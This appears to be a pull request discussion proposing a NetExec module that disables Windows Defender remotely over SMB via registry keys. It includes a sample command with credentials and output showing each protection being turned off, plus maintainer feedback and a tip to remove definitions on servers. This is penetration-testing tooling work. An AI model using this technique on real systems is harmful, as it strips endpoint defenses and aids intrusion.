Defender control module proposal

[byinarie]

This PoC module enables or disables Windows Defender via the registry over SMB, additional functionality would also include things like adding/removing exclusions, definitions, starting/stopping the service and so on.

Only submitting a PR with the mvp to get community feedback and thoughts on having this module be included in NetExec.

poetry run NetExec smb 10.10.100.45 -u Administrator -p 'P@ssw0rd!' -M defender -o ACTION=disable

[*] Ignore OPSEC in configuration is set and OPSEC unsafe module loaded
SMB         10.10.100.45    445    DESKTOP-07QF5CJ  [*] Windows 10.0 Build 19041 x64 (name:DESKTOP-07QF5CJ) (domain:DESKTOP-07QF5CJ) (signing:False) (SMBv1:False)
SMB         10.10.100.45    445    DESKTOP-07QF5CJ  [+] DESKTOP-07QF5CJ\Administrator:P@ssw0rd! (Pwn3d!)
DEFENDER    10.10.100.45    445    DESKTOP-07QF5CJ  [+] Modified PUAProtection to 0 via SMB
DEFENDER    10.10.100.45    445    DESKTOP-07QF5CJ  [+] Modified ServiceKeepAlive to 0 via SMB
DEFENDER    10.10.100.45    445    DESKTOP-07QF5CJ  [+] Modified DisableRoutinelyTakingAction to 1 via SMB
DEFENDER    10.10.100.45    445    DESKTOP-07QF5CJ  [+] Modified DisableAntiSpyware to 1 via SMB
DEFENDER    10.10.100.45    445    DESKTOP-07QF5CJ  [+] Modified DisableAntiVirus to 1 via SMB
DEFENDER    10.10.100.45    445    DESKTOP-07QF5CJ  [+] Modified RealtimeScanDirection to 1 via SMB
DEFENDER    10.10.100.45    445    DESKTOP-07QF5CJ  [+] Modified IOAVMaxSize to 1 via SMB
DEFENDER    10.10.100.45    445    DESKTOP-07QF5CJ  [+] Modified DisableScanOnRealtimeEnable to 1 via SMB
DEFENDER    10.10.100.45    445    DESKTOP-07QF5CJ  [+] Modified DisableRealtimeMonitoring to 1 via SMB
DEFENDER    10.10.100.45    445    DESKTOP-07QF5CJ  [+] Modified DisableOnAccessProtection to 1 via SMB
DEFENDER    10.10.100.45    445    DESKTOP-07QF5CJ  [+] Modified DisableIOAVProtection to 1 via SMB
DEFENDER    10.10.100.45    445    DESKTOP-07QF5CJ  [+] Modified DisableBehaviorMonitoring to 1 via SMB
DEFENDER    10.10.100.45    445    DESKTOP-07QF5CJ  [+] Modified DisableScriptScanning to 1 via SMB
DEFENDER    10.10.100.45    445    DESKTOP-07QF5CJ  [+] Modified DisableIntrusionPreventionSystem to 1 via SMB

Reference Registry keys: https://admx.help/HKLM/Software/Policies/Microsoft/Windows%20Defender

[Marshall-Hallenbeck]

@byinarie I like the module. Instead of outputting every single registry change, could you instead just write one message like "Defender Disabled" or "Defender Enabled" after they are changed successfully, and then do a debug message for each one? I can imagine if you are running this across several hosts it's going to absolutely spam the hell out of your terminal.

[NeffIsBack]

Or info message:)

[Marshall-Hallenbeck]

Changed to merged into develop

[byinarie]

Changed to merged into develop

working on making the changes suggested here and a few others. Will submit when complete. Appreciate the feedback :)

[bongobongoland]

Hi there. Just saw this :)
So with Server OSs, all you need to do is remove WD's definitions. With desktop Windows you need to do much more that that (as shown on your screenshot). So I'm wondering if the best strategy is to check the OS version first and then decide which option is most suitable.

[byinarie]

update: been busy with but will be finishing the code soon :)

[Marshall-Hallenbeck]

@byinarie any idea on when you'd be able to finish this? If not, what were you going to update? I find myself doing this manually, so I think this would be a great addition and can help out implement whatever you wanted to finish up adding. Let me know.